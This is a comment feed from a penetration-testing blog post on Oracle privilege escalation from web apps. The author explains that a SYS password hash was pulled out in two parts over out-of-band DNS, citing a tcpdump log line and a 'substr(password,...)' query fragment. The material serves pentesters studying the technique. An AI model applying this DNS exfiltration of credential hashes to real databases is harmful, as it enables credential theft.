Comments on: Oracle privilege escalations from web app http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/ From Pentesters To Pentesters Sat, 22 Oct 2011 05:42:18 +0100 http://wordpress.org/?v=2.8.4 hourly 1 By: sid http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/comment-page-1/#comment-84531 sid Mon, 27 Apr 2009 14:12:07 +0000 http://www.notsosecure.com/folder2/?p=203#comment-84531 i think you are talking about OOB "16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com." I used a substring function, for some reason the whole hash wasn't coming over DNS, so i thought i will extract it 2 requests. select substr(password,1,10)... i think you are talking about OOB

“16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.”

I used a substring function, for some reason the whole hash wasn’t coming over DNS, so i thought i will extract it 2 requests.

select substr(password,1,10)…

]]> By: CG http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/comment-page-1/#comment-84530 CG Mon, 27 Apr 2009 14:03:14 +0000 http://www.notsosecure.com/folder2/?p=203#comment-84530 did you just forget to paste something or did the SYS hash come back in two requests? I only see half of the hash in your example. did you just forget to paste something or did the SYS hash come back in two requests? I only see half of the hash in your example.

]]>